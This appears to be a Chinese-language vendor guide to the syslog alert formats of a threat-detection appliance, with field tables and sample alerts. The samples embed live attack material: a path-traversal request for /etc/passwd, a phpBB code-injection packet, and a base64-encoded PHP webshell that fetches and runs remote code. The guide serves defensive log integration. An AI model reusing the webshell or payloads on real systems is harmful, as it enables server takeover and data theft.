syslog格式說明
1 告警日誌
1.1.1 字段說明
| 字段名稱 | 字段含義 |
| access_time | 告警時間 |
| alarm_sip | 受害ip |
| attack_org | 攻擊組織 |
| attack_sip | 攻擊ip |
| attack_type | 攻擊類型 |
| file_md5 | 文件md5 |
| file_name | 文件名 |
| hazard_level | 威脅級別 |
| host | 域名 |
| host_md5 | 域名md5 |
| ioc | ioc |
| nid | nid |
| rule_key | 規則類型 |
| serial_num | 聯動設備序列號 |
| skyeye_type | 原始日誌類型 |
| type | 告警二級分類 |
| super_type | 告警一級分類 |
| type_chain | 告警子類標籤編碼 |
| host_state | 攻擊結果 |
| confidence | 確信度 |
| vuln_type | 威脅名稱 |
| attack_chain | 攻擊鏈標籤二級編號 |
| super_attack_chain | 攻擊鏈標籤一級編號 |
| is_web_attack | 是否web攻擊 |
1.1.2 字典類型字段說明
hazard_level威脅級別:
| 一、二、3 | 低危 |
| 四、5 | 中危 |
| 六、7 | 高危 |
| 八、九、10 | 危急 |
1.1.3 範例
發送syslog的格式爲 : (facility = local3,日誌級別爲:warning)
發送時間 客戶端IP 日誌類型 日誌
2018-04-23 15:16:37|!172.17.20.159|!alarm|!{"attack_type": "", "first_access_time": "2018-04-18T11:05:07.000+0800", "ioc": "3306", "access_time": "2018-04-18T11:05:07.000+0800", "alarm_sip": "63.3.5.7", "nid": "17298326168730075144", "attack_sip": "11.1.1.18", "hazard_level": 7, "super_type": "攻擊利用", "type": "自定義情報告警", "sip_ioc_dip": "31d51ab43633a6d4f5ef926a856dddd8"}
發送時間 客戶端IP 日誌類型 日誌
2018-04-23 15:16:37|!172.17.20.159|!alarm|!{"attack_type": "", "first_access_time": "2018-04-18T11:05:07.000+0800", "ioc": "3306", "access_time": "2018-04-18T11:05:07.000+0800", "alarm_sip": "63.3.5.7", "nid": "17298326168730075144", "attack_sip": "11.1.1.18", "hazard_level": 7, "super_type": "攻擊利用", "type": "自定義情報告警", "sip_ioc_dip": "31d51ab43633a6d4f5ef926a856dddd8"}
1.2 系統日誌
1.2.1 字段說明
| 字段名稱 | 字段含義 |
| name | 警告內容 |
| value | 當前值 |
1.2.2 範例
發送syslog的格式爲 : (facility = local3,日誌級別爲:info)
發送時間 客戶端IP 日誌類型 日誌
2018-05-14 15:10:52|!10.91.4.13|!log|![{"name": "空閒CPU百分比過低", "value": 19.7}, {"name": "15分鐘平均CPU負載過高", "value": 35.1}]
發送時間 客戶端IP 日誌類型 日誌
2018-05-14 15:10:52|!10.91.4.13|!log|![{"name": "空閒CPU百分比過低", "value": 19.7}, {"name": "15分鐘平均CPU負載過高", "value": 35.1}]
1.3 原始告警
1.3.1 字段說明
告警字段一:webids-webattack_dolog 網頁漏洞利用php
| 字段名稱 | 字段含義 |
| attack_type | 攻擊類型 |
| attack_type_all | 攻擊類型(全) |
| referer | HTTP-來源 |
| file_name | 文件名 |
| agent | 代理 |
| victim | 受害者 |
| sport | 源端口 |
| rsp_status | 相應狀態 |
| sip | 源IP |
| severity | 危害級別 |
| rsp_body_len | 相應體長度 |
| serial_num | 採集設備序列號 |
| rsp_content_type | 響應內容類型 |
| parameter | HTTP請求參數 |
| method | 攻擊方法 |
| req_body | 請求體 |
| req_header | 請求頭 |
| rule_name | 規則名稱 |
| host | 域名 |
| cookie | cookie |
| write_date | 寫入時間 |
| attacker | 攻擊者 |
| victim_type | 受攻擊者類型 |
| attack_flag | 攻擊標識 |
| uri | URI |
| rsp_content_length | 響應內容長度 |
| rule_version | 規則版本 |
| rsp_body | 響應體 |
| rsp_header | 響應頭 |
| dport | 目的端口 |
| dolog_count | 告警次數 |
| dip | 目的IP |
| rule_id | 規則ID |
| confidence | 確信度 |
| detail_info | 告警詳細信息 |
| solution | 解決方案 |
| vuln_desc | 攻擊描述 |
| vuln_harm | 攻擊危害 |
| vuln_name | 威脅名稱 |
| vuln_type | 威脅類型 |
| webrules_tag | web攻擊類規則標籤 |
| public_date | 發佈時間 |
| code_language | 使用語言 |
| site_app | 建站app |
| kill_chain | 攻擊鏈 |
| kill_chain_all | 攻擊鏈(全) |
| instranet_rule_all | 內部網絡規則 |
| attack_result | 攻擊結果 |
| xff | xff代理 |
告警字段二:webids-webshell_dolog webshell上傳html
| 字段名稱 | 字段含義 |
| attack_type | 攻擊類型 |
| attack_type_all | 攻擊類型(全) |
| attack_flag | 攻擊標識 |
| sip | 源IP |
| write_date | 寫入時間 |
| victim | 受害者 |
| file_dir | 文件目錄 |
| url | URL |
| victim_type | 受攻擊者類型 |
| file_md5 | 附件MD5 |
| serial_num | 採集設備序列號 |
| attacker | 攻擊者 |
| host | 域名 |
| file | 文件 |
| dport | 目的端口 |
| sport | 源端口 |
| dip | 目的IP |
| rule_ip | 規則ID |
| severity | 危害級別 |
| confidence | 確信度 |
| detail_info | 告警詳細信息 |
| attack_desc | 攻擊描述 |
| attack_harm | 攻擊危害 |
| rule_name | 規則名稱 |
| kill_chain | 攻擊鏈 |
| kill_chain_all | 攻擊鏈(全) |
| attack_result | 攻擊結果 |
| xff | xff代理 |
告警字段三:webids_ids_dolog 網絡攻擊git
| 字段名稱 | 字段含義 |
| attack_type | 攻擊類型 |
| attack_type_all | 攻擊類型(全) |
| dip | 目的IP |
| packet_data | 載荷內容 |
| victim | 受害者 |
| sport | 源端口 |
| affected_system | 影響的系統 |
| sip | 源IP |
| severity | 危害級別 |
| detail_info | 告警詳細信息 |
| attacker | 攻擊者 |
| packet_size | 載荷大小 |
| info_id | 漏洞編號 |
| description | 網絡攻擊描述 |
| sig_id | 特徵編號 |
| rule_name | 規則名稱 |
| write_date | 寫入時間 |
| protocol_id | 網絡攻擊協議 |
| attack_method | 攻擊方法 |
| attcak_flag | 攻擊標誌 |
| rule_id | 規則ID |
| serial_num | 採集設備序列號 |
| appid | 應用ID |
| dport | 目的端口 |
| vuln_type | 威脅類型 |
| victim_type | 受攻擊者類型 |
| bulletin | 解決方案 |
| confidence | 確信度 |
| webrules_tag | web攻擊類規則標籤 |
| ids_rule_version | IDS規則版本號 |
| cnnvd_id | CNNVD編號 |
| kill_chain | 攻擊鏈 |
| kill_chain_all | 攻擊鏈(全) |
| instranet_rule_all | 內部網絡規則 |
| attack_result | 攻擊結果 |
| xff | xff代理 |
告警字段四:webids_ioc_dolog 威脅情報web
| 字段名稱 | 字段含義 |
| access_time | 日誌產生時間 |
| tid | 惡意家族ID |
| type | 惡意事件類型 |
| rule_desc | 規則詳情 |
| offence_type | 關注類型 |
| offence_value | 關注內容 |
| sip | 源IP |
| dip | 目的IP |
| serverity | 危害級別 |
| serial_num | 採集設備序列號 |
| rule_state | 規則狀態 |
| ioc_type | 規則類型 |
| ioc_value | 規則內容 |
| nid | IOCw惟一編號 |
| etime | 結束時間 |
| malicious_type | 威脅類型 |
| kill_chain | 攻擊鏈 |
| kill_chain_all | 攻擊鏈(全) |
| xml_confidence | 確信度 |
| malicious_family | 惡意家族 |
| campaign | 攻擊時間/團伙 |
| targeted | 定向攻擊 |
| tag | 惡意家族標籤 |
| paltform | 影響平臺 |
| current_status | 當前狀態 |
| packed_data | 載荷內容 |
| ioc_source | 威脅情報源 |
| sport | 源端口 |
| dport | 目的端口 |
| proto | 協議 |
| dns_type | DNS類型 |
| filename | 文件名稱 |
| file_md5 | 文件MD5 |
| desc | 描述 |
| file_direction | 文件傳輸方向 |
| host | 域名 |
| uri | URL |
| dns_arecord | DNS記錄 |
| tproto | 傳輸層協議 |
| file_content | 文件內容 |
| attack_ip | 攻擊IP |
| victim_ip | 受害IP |
| attack_type | 攻擊類型 |
| attack_type_all | 攻擊類型(全) |
| xff | xff代理 |
1.3.2 字典類型字段說明
hazard_rating威脅級別:
| 一、二、3 | 低危 |
| 四、5 | 中危 |
| 六、7 | 高危 |
| 八、九、10 | 危急 |
host_state告警結果:
| 0 | 企圖 |
| 1 | 攻擊成功 |
| 2 | 失陷 |
1.3.3 範例
webids-ioc_dolog範例
發送syslog的格式爲 : (facility = local3,日誌級別爲:warning)
發送時間 客戶端IP 日誌類型 日誌
2019-08-15 17:50:47|!10.91.4.198|!webids-ioc_dolog|!{"rule_desc": "APT17 APT組織活動事件", "campaign": "APT17", "@timestamp": "2019-08-15T17:00:07.946+0800", "packet_data": "AJALLmC1AFBWogIqCABFAABAh5tAAEARxOUKBQAd3wUFBaEjADUALHr7l9Q BAAABAAAAAAAAA2FsaQpibGFua2NoYWlyA2NvbQAAAQAB", "dns_arecord": "", "tproto": "udp", "host_reraw": "com.blankchair.ali", "sport": 41251, "host_raw": "ali.blankchair.com", "attack_ip": "", "ioc_type": "host", "etime": "2017-03-08 13:33:11", "attack_type": "APT事件", "sip": "10.5.0.29","severity": 9, "proto": "dns", "kill_chain_all": "命令控制:0x03000000|命令 控制服務器鏈接:0x030a0000", "filename": "", "serial_num": "QbJK/cNEg", "dns_type": 0, "rule_state": "green", "tid": 1, "attack_type_all": "APT事件:10000000|APT事件:10010000", "type": "KNOWN APT", "uri_md5": "d41d8cd98f00b204e9800998ecf8427e", "targeted": true, "access_time": 1565859693000, "nid": "1161928703861588190","file_md5": "", "kill_chain": "c2", "offence_value": "10.5.0.29", "host": "ali.blankchair.com", "victim_ip": "10.5.0.29", "malicious_family": "Unknown", "geo_dip": {"subdivision": "Zhejiang Sheng", "country_code2": "CN", "longitude": "120.1614", "latitude": "30.2936", "continent_code": "AS", "city_name": "Hangzhou"}, "desc": "APT 17活動詳情\n\nAPT 17是在2015年8月被FireEye公開揭露出來的一個 APT組織,最先的活動能夠追溯到2013年。相關行動的主要細節以下:\n\n使用的攻擊方式:水坑\n涉及行業:日本軟件公司\n受影響國家:日本\n相關 技術:\n\t\t\t一、使用的遠控木馬爲:BLACKCOFFEE, WEBCnC, Joy RAT, PlugX。\n\t\t\t 二、該組織經過竊取日本軟件公司的證書而後給惡意軟件簽名,誘使目標下載安裝BLACKOFFICE後門。\n\t\t\t 三、其餘別名:Deputy Dog、Aurora Panda。\n\t\t\t\n\t\t\t\n 參考連接:\n\t\t http://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html\n\t\t http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html\n", "xml_confidence": "high", "offence_type": "sip", "host_md5": "97419d43006658e6d6f3a6446ee83fa2", "@version": "6", "uri": "", "current_status": "inactive", "ioc_source": 0, "ioc_value": "ali.blankchair.com", "dport": 53, "dip": "223.5.5.5", "malicious_type": "APT事件"}
發送時間 客戶端IP 日誌類型 日誌
2019-08-15 17:50:47|!10.91.4.198|!webids-ioc_dolog|!{"rule_desc": "APT17 APT組織活動事件", "campaign": "APT17", "@timestamp": "2019-08-15T17:00:07.946+0800", "packet_data": "AJALLmC1AFBWogIqCABFAABAh5tAAEARxOUKBQAd3wUFBaEjADUALHr7l9Q BAAABAAAAAAAAA2FsaQpibGFua2NoYWlyA2NvbQAAAQAB", "dns_arecord": "", "tproto": "udp", "host_reraw": "com.blankchair.ali", "sport": 41251, "host_raw": "ali.blankchair.com", "attack_ip": "", "ioc_type": "host", "etime": "2017-03-08 13:33:11", "attack_type": "APT事件", "sip": "10.5.0.29","severity": 9, "proto": "dns", "kill_chain_all": "命令控制:0x03000000|命令 控制服務器鏈接:0x030a0000", "filename": "", "serial_num": "QbJK/cNEg", "dns_type": 0, "rule_state": "green", "tid": 1, "attack_type_all": "APT事件:10000000|APT事件:10010000", "type": "KNOWN APT", "uri_md5": "d41d8cd98f00b204e9800998ecf8427e", "targeted": true, "access_time": 1565859693000, "nid": "1161928703861588190","file_md5": "", "kill_chain": "c2", "offence_value": "10.5.0.29", "host": "ali.blankchair.com", "victim_ip": "10.5.0.29", "malicious_family": "Unknown", "geo_dip": {"subdivision": "Zhejiang Sheng", "country_code2": "CN", "longitude": "120.1614", "latitude": "30.2936", "continent_code": "AS", "city_name": "Hangzhou"}, "desc": "APT 17活動詳情\n\nAPT 17是在2015年8月被FireEye公開揭露出來的一個 APT組織,最先的活動能夠追溯到2013年。相關行動的主要細節以下:\n\n使用的攻擊方式:水坑\n涉及行業:日本軟件公司\n受影響國家:日本\n相關 技術:\n\t\t\t一、使用的遠控木馬爲:BLACKCOFFEE, WEBCnC, Joy RAT, PlugX。\n\t\t\t 二、該組織經過竊取日本軟件公司的證書而後給惡意軟件簽名,誘使目標下載安裝BLACKOFFICE後門。\n\t\t\t 三、其餘別名:Deputy Dog、Aurora Panda。\n\t\t\t\n\t\t\t\n 參考連接:\n\t\t http://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html\n\t\t http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html\n", "xml_confidence": "high", "offence_type": "sip", "host_md5": "97419d43006658e6d6f3a6446ee83fa2", "@version": "6", "uri": "", "current_status": "inactive", "ioc_source": 0, "ioc_value": "ali.blankchair.com", "dport": 53, "dip": "223.5.5.5", "malicious_type": "APT事件"}
webids-ids_dolog範例
發送syslog的格式爲 : (facility = local3,日誌級別爲:warning)
發送時間 客戶端IP 日誌類型 日誌
2019-08-15 17:50:45|!10.91.4.198|!webids-ids_dolog|!{"intranet_rule_all": null, "ids_rule_version": "1.0", "cnnvd_id": "", "description": "1", "appid": 77, "packet_data": "UFeo1Lt/AAwphPOJCABFAAE7ewtAAEAGqGEKEwEVChMBFptiA FCb/E2ZyqJLgVAYAC4O7QAAR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU 3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JT U0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJ TI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50 OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS41KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAx Mzg5KQ0KSG9zdDogd3d3LjM2MC5jbg0KDQo=", "xff": null, "kill_chain": "0x02010000", "rule_name": "phpBB Viewtopic.PHP PHP Highlight Script Injection Vulnerability", "webrules_tag": "1", "attack_result": "0", "victim": "10.19.1.22", "dport": 80, "bulletin": "", "sport": 39778, "affected_system": "", "attack_type": "代碼執行", "confidence": 50, "sip": "10.19.1.21", "severity": 6, "protocol_id": 6, "attack_method": "", "attack_flag": "true", "kill_chain_all": "入侵:0x02000000|漏洞探測:0x02010000", "detail_info": "phpBB 2.x versions prior to version 2.0.11 are prone to a script injection vulnerability while parsing certain crafted HTTP requests. The vulnerability is due to the lack of proper checks on highlights in the HTTP request, allowing for a remote code execution. An attacker could exploit the vulnerability by sending a crafted HTTP request. A successful attack could lead to a remote code execution with the privileges of the server.\n\n
Reference:http://marc.theaimsgroup.com/?l=bugtraq&m=110029415208724&w=2, http://marc.theaimsgroup.com/?t=110079440800004&r=1&w=2,http://marc.theaimsgroup.com/?l=bugtraq&m=110365752909029&w=2, http://marc.theaimsgroup.com/?l=bugtraq&m=110143995118428&w=2,http://www.us-cert.gov/cas/techalerts/TA04-356A.html, http://www.kb.cert.org/vuls/id/497400,http://secunia.com/advisories/13239/,http://xforce.iss.net/xforce/xfdb/18052", "attacker": "10.19.1.21", "packet_size": 329, "info_id": "9506", "attack_type_all": "攻擊利用:16000000|代碼執行:16030000", "serial_num": "QbJK/cNEg", "sig_id": 33590712, "write_date": 1565857707, "victim_type": "server", "vuln_type": "代碼執行", "dip": "10.19.1.22", "rule_id": 2414}
發送時間 客戶端IP 日誌類型 日誌
2019-08-15 17:50:45|!10.91.4.198|!webids-ids_dolog|!{"intranet_rule_all": null, "ids_rule_version": "1.0", "cnnvd_id": "", "description": "1", "appid": 77, "packet_data": "UFeo1Lt/AAwphPOJCABFAAE7ewtAAEAGqGEKEwEVChMBFptiA FCb/E2ZyqJLgVAYAC4O7QAAR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU 3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JT U0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJ TI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50 OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS41KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAx Mzg5KQ0KSG9zdDogd3d3LjM2MC5jbg0KDQo=", "xff": null, "kill_chain": "0x02010000", "rule_name": "phpBB Viewtopic.PHP PHP Highlight Script Injection Vulnerability", "webrules_tag": "1", "attack_result": "0", "victim": "10.19.1.22", "dport": 80, "bulletin": "", "sport": 39778, "affected_system": "", "attack_type": "代碼執行", "confidence": 50, "sip": "10.19.1.21", "severity": 6, "protocol_id": 6, "attack_method": "", "attack_flag": "true", "kill_chain_all": "入侵:0x02000000|漏洞探測:0x02010000", "detail_info": "phpBB 2.x versions prior to version 2.0.11 are prone to a script injection vulnerability while parsing certain crafted HTTP requests. The vulnerability is due to the lack of proper checks on highlights in the HTTP request, allowing for a remote code execution. An attacker could exploit the vulnerability by sending a crafted HTTP request. A successful attack could lead to a remote code execution with the privileges of the server.\n\n
Reference:http://marc.theaimsgroup.com/?l=bugtraq&m=110029415208724&w=2, http://marc.theaimsgroup.com/?t=110079440800004&r=1&w=2,http://marc.theaimsgroup.com/?l=bugtraq&m=110365752909029&w=2, http://marc.theaimsgroup.com/?l=bugtraq&m=110143995118428&w=2,http://www.us-cert.gov/cas/techalerts/TA04-356A.html, http://www.kb.cert.org/vuls/id/497400,http://secunia.com/advisories/13239/,http://xforce.iss.net/xforce/xfdb/18052", "attacker": "10.19.1.21", "packet_size": 329, "info_id": "9506", "attack_type_all": "攻擊利用:16000000|代碼執行:16030000", "serial_num": "QbJK/cNEg", "sig_id": 33590712, "write_date": 1565857707, "victim_type": "server", "vuln_type": "代碼執行", "dip": "10.19.1.22", "rule_id": 2414}
webids-webattack_dolog範例
發送syslog的格式爲 : (facility = local3,日誌級別爲:warning)
發送時間 客戶端IP 日誌類型 日誌
2019-08-15 17:50:45|!10.91.4.198|!webids-webattack_dolog|!{"webrules_tag": "1", "referer": " http://www.baidu.com:80/", "file_name": "", "@timestamp": "2019-08-15T16:33:07.619+0800", "agent": "", "solution": "對此類敏感請求進行攔截。", "host_reraw": "com.baidu.www", "attack_result": "0", "victim": "10.19.1.23", "sport": 57400, "attack_type": "默認配置不當", "rsp_status": 0, "sip": "10.19.1.22", "severity": 6, "rsp_body_len": 0, "public_date": "2018-08-30 16:27:11", "kill_chain_all": "偵察:0x01000000|信息泄露:0x01020000", "detail_info": "發如今HTTP請求中發現試圖訪問Linux下敏感文件的疑似攻擊行爲。", "serial_num": "QbJK/cNEg", "rsp_content_type": "", "vuln_name": "發現嘗試請求Linux下敏感文件", "vuln_harm": "此類請求行爲一旦成功, 攻擊者可經過訪問敏感信息實施進一步的攻擊。", "parameter": "cl=../../../../../../../../../../etc/passwd&rn=20&rtt=2&tn=baiduwb&wd=win8.1", "method": "GET", "req_body": "", "uri_md5": "3167e39c45796fff2ec661320c219333", "req_header": "GET /s?cl=../../../../../../../../../../etc/passwd&rn=20&rtt=2&tn=baiduwb&wd=win8.1 HTTP/1.1\r\n Referer: http://www.baidu.com:80/\r\nCookie: BAIDUID=C97B192DE3AF2C166FC837A952E1FB47:FG=1; BDSVRTM=9; H_PS_PSSID=4392_1427_4261_4897_4760_4677; BD_CK_SAM=1; BDRCVFR[yddw7FPe_pC]=I67x6TjHwwYf0; BDSFRCVID=vFAsJeCCxG0PZ3nCzm2M8f3dpNmwn80nQT0m3J; H_BDCLCKID_SF=tRk8oItMJCvqKRopMtOhq4tehH4qQhReWDTm5-nTtUJAhnrJ24 FKqqkl-to80-rfaJ-jWfjmtnC5OCFljTu2D5O0eU_X5to05TIX3b7Ef-QPEtO_bfbT2MbQ0bCe2fJEaRruVnLb5PJFDt3ke53_0q3QhHbZqtJHKbDtoD-KJfK; NOJS=1\r\nHost: www.baidu.com\r\nConnection: Keep-alive\r\nAccept-Encoding: gzip,deflate\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36\r\nAccept: */*\r\n\r\n", "confidence": 50, "kill_chain": "0x01020000", "rule_name": "發現嘗試請求Linux下敏感文件", "host": "www.baidu.com", "cookie": " BAIDUID=C97B192DE3AF2C166FC837A952E1FB47:FG=1; BDSVRTM=9; H_PS_PSSID=4392_1427_4261_4897_4760_4677; BD_CK_SAM=1; BDRCVFR[yddw7FPe_pC]=I67x6TjHwwYf0; BDSFRCVID=vFAsJeCCxG0PZ3nCzm2M8f3dpNmwn80nQT0m3J; H_BDCLCKID_SF=tRk8oItMJCvqKRopMtOhq4tehH4qQhReWDTm5-nTtUJAhnrJ24FKqqkl-to80-rfaJ-jWfjmtnC5OCFljTu2D5O0eU_X5to05TIX3b7Ef-QPEtO_bfbT2MbQ0bCe2fJEaRruVnLb5PJFDt3ke53_0q3QhHbZqtJHKbDtoD-KJfK; NOJS=1", "@version": "6", "write_date": 1565858082, "code_language": "其餘", "site_app": "其餘", "host_md5": "dab19e82e1f9a681ee73346d3e7a575e", "attacker": "10.19.1.22", "victim_type": "server", "attack_flag": "true", "uri": "/s?cl=../../../../../../../../../../etc/passwd&rn=20&rtt=2&tn=baiduwb&wd=win8.1", "rsp_content_length": 0, "vuln_desc": "發如今 HTTP請求中發現試圖訪問Linux下敏感文件的疑似攻擊行爲。", "rule_version": 1, "attack_type_all": "攻擊利用:16000000|配置不當/錯誤:160C0000", "rsp_body": "", "rsp_header": "", "dport": 80, "dolog_count": 1, "vuln_type": "默認配置不當", "dip": "10.19.1.23", "rule_id": 268567921, "host_raw": "www.baidu.com"}
發送時間 客戶端IP 日誌類型 日誌
2019-08-15 17:50:45|!10.91.4.198|!webids-webattack_dolog|!{"webrules_tag": "1", "referer": " http://www.baidu.com:80/", "file_name": "", "@timestamp": "2019-08-15T16:33:07.619+0800", "agent": "", "solution": "對此類敏感請求進行攔截。", "host_reraw": "com.baidu.www", "attack_result": "0", "victim": "10.19.1.23", "sport": 57400, "attack_type": "默認配置不當", "rsp_status": 0, "sip": "10.19.1.22", "severity": 6, "rsp_body_len": 0, "public_date": "2018-08-30 16:27:11", "kill_chain_all": "偵察:0x01000000|信息泄露:0x01020000", "detail_info": "發如今HTTP請求中發現試圖訪問Linux下敏感文件的疑似攻擊行爲。", "serial_num": "QbJK/cNEg", "rsp_content_type": "", "vuln_name": "發現嘗試請求Linux下敏感文件", "vuln_harm": "此類請求行爲一旦成功, 攻擊者可經過訪問敏感信息實施進一步的攻擊。", "parameter": "cl=../../../../../../../../../../etc/passwd&rn=20&rtt=2&tn=baiduwb&wd=win8.1", "method": "GET", "req_body": "", "uri_md5": "3167e39c45796fff2ec661320c219333", "req_header": "GET /s?cl=../../../../../../../../../../etc/passwd&rn=20&rtt=2&tn=baiduwb&wd=win8.1 HTTP/1.1\r\n Referer: http://www.baidu.com:80/\r\nCookie: BAIDUID=C97B192DE3AF2C166FC837A952E1FB47:FG=1; BDSVRTM=9; H_PS_PSSID=4392_1427_4261_4897_4760_4677; BD_CK_SAM=1; BDRCVFR[yddw7FPe_pC]=I67x6TjHwwYf0; BDSFRCVID=vFAsJeCCxG0PZ3nCzm2M8f3dpNmwn80nQT0m3J; H_BDCLCKID_SF=tRk8oItMJCvqKRopMtOhq4tehH4qQhReWDTm5-nTtUJAhnrJ24 FKqqkl-to80-rfaJ-jWfjmtnC5OCFljTu2D5O0eU_X5to05TIX3b7Ef-QPEtO_bfbT2MbQ0bCe2fJEaRruVnLb5PJFDt3ke53_0q3QhHbZqtJHKbDtoD-KJfK; NOJS=1\r\nHost: www.baidu.com\r\nConnection: Keep-alive\r\nAccept-Encoding: gzip,deflate\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36\r\nAccept: */*\r\n\r\n", "confidence": 50, "kill_chain": "0x01020000", "rule_name": "發現嘗試請求Linux下敏感文件", "host": "www.baidu.com", "cookie": " BAIDUID=C97B192DE3AF2C166FC837A952E1FB47:FG=1; BDSVRTM=9; H_PS_PSSID=4392_1427_4261_4897_4760_4677; BD_CK_SAM=1; BDRCVFR[yddw7FPe_pC]=I67x6TjHwwYf0; BDSFRCVID=vFAsJeCCxG0PZ3nCzm2M8f3dpNmwn80nQT0m3J; H_BDCLCKID_SF=tRk8oItMJCvqKRopMtOhq4tehH4qQhReWDTm5-nTtUJAhnrJ24FKqqkl-to80-rfaJ-jWfjmtnC5OCFljTu2D5O0eU_X5to05TIX3b7Ef-QPEtO_bfbT2MbQ0bCe2fJEaRruVnLb5PJFDt3ke53_0q3QhHbZqtJHKbDtoD-KJfK; NOJS=1", "@version": "6", "write_date": 1565858082, "code_language": "其餘", "site_app": "其餘", "host_md5": "dab19e82e1f9a681ee73346d3e7a575e", "attacker": "10.19.1.22", "victim_type": "server", "attack_flag": "true", "uri": "/s?cl=../../../../../../../../../../etc/passwd&rn=20&rtt=2&tn=baiduwb&wd=win8.1", "rsp_content_length": 0, "vuln_desc": "發如今 HTTP請求中發現試圖訪問Linux下敏感文件的疑似攻擊行爲。", "rule_version": 1, "attack_type_all": "攻擊利用:16000000|配置不當/錯誤:160C0000", "rsp_body": "", "rsp_header": "", "dport": 80, "dolog_count": 1, "vuln_type": "默認配置不當", "dip": "10.19.1.23", "rule_id": 268567921, "host_raw": "www.baidu.com"}
webids-webshell_dolog範例
發送syslog的格式爲 : (facility = local3,日誌級別爲:warning) 發送時間 客戶端IP 日誌類型 日誌 2019-08-15 17:50:46|!10.91.4.198|!webids-webshell_dolog|!{"file": "PD9waHANCmVycm9yX3JlcG9ydGluZygwKTsNCnNlc3Npb25fc3RhcnQoKTsNCmhlYWRlcigiQ29 udGVudC10eXBlOnRleHQvaHRtbDtjaGFyc2V0PWdiayIpOw0KJHBhc3N3b3JkID0gInB1an llaDRpZmxpdWV2bSI7IA0KaWYoZW1wdHkoJF9TRVNTSU9OWydhcGkxMjM0J10pKSANCgkkX1 NFU1NJT05bJ2FwaTEyMzQnXT1maWxlX2dldF9jb250ZW50cyhzcHJpbnRmKCclcz8lcycscGF jaygiSCoiLCc2ODc0NzQ3MDNBMkYyRjMxMzIzMzJFMzEzMjM1MkUzMTMxMzQyRTM4MzIyRjZBN zg2NjYyNzU2MzZCNjU3NDMyMzAzMTM0MzEyRjY4NjE2MzZCMkYzMTJFNkE3MDY3JyksdW5pcWlkK CkpKTsNCmlmKHN0cmlwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCdiYWlkdScpKzA9 PTApIGV4aXQ7DQppZihzdHJpcG9zKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSwnbXljY 3MnKSswPT0wKSBleGl0OwkNCigkYjRkYm95ID0gZ3p1bmNvbXByZXNzKCRfU0VTU0lPTlsnYXBpM TIzNCddKSkgJiYgQHByZWdfcmVwbGFjZSgnL2FkL2UnLCdAJy5zdHJfcm90MTMoJ3JpbnknKS4nKC RiNGRib3kpJywgJ2FkZCcpOw0KPz4=", "@timestamp": "2019-08-15T16:28:14.421+0800", "host_reraw": "171:8081.66.16.10","attack_result": "0", "victim": "10.16.66.171", "sport": 45299, "attack_type": "加密後門", "confidence": 80, "sip": "192.168.61.133", "severity": 8, "file_dir": "upload", "kill_chain_all": "入侵:0x02000000|漏洞探測:0x02010000", "detail_info": "攻擊者企圖上傳一個後門文件。後門程序通常是指那些繞過安全性控制而獲取對程序或 系統訪問權的程序。該後門文件在調用>某些PHP函數後會輸出一段代碼,該代碼中含有一些高度危險的函數, 好比base64_decode/create_function/chr等,具備後門的顯著特徵,可實現對服務器的操做和控制。", "serial_num": "QbJK/cNEg", "attack_harm": "服務器被植入後門程序後可能致使如下後果: 1.整個網站或者服務器被黑客控制,變成傀儡主機;2.核心數據被竊取,形成用戶信息泄露。", "file_md5": "55c1a4fee7821c8689dc4fd895f593ed", "kill_chain": "0x02010000", "attacker": "192.168.61.133", "host": "10.16.66.171:8081", "@version": "6", "write_date": 1565857831, "attack_desc": "攻擊者企圖上傳一個後門文件。後門程序通常是指那些繞過>安全性控制而獲取對程序或系統訪問權的程序。 該後門文件在調用某些PHP函數後會輸出一段代碼,該代碼中含有一些高度危險的函數,好比base64_decode/create_function/chr等, 具備後門的顯著特徵,可實現對>服務器的操做和控制。", "host_md5": "28713b58235ab268378f0af86cecaa64", "rule_name": "加密後門.B", "url": "/upload/upload.php", "dip": "10.16.66.171", "attack_flag": "true", "webrules_tag": "1", "attack_type_all": "攻擊利用:16000000|webshell上傳:161C0000", "dport": 8081, "victim_type": "server", "rule_id": 10027, "host_raw": "10.16.66.171:8081"}
相關文章
- 1. linux下syslog使用說明
- 2. IFC格式說明
- 3. Crontab格式說明
- 4. sp3格式說明
- 5. Python3+syslog使用及相關說明
- 6. MapInfo 文件格式說明
- 7. Quartz格式設置說明
- 8. Crontab使用格式說明
- 9. SWF文件格式說明
- 10. json數據格式說明
- 更多相關文章...
- • Eclipse 窗口說明 - Eclipse 教程
- • PHP EOF(heredoc) 使用說明 - PHP教程
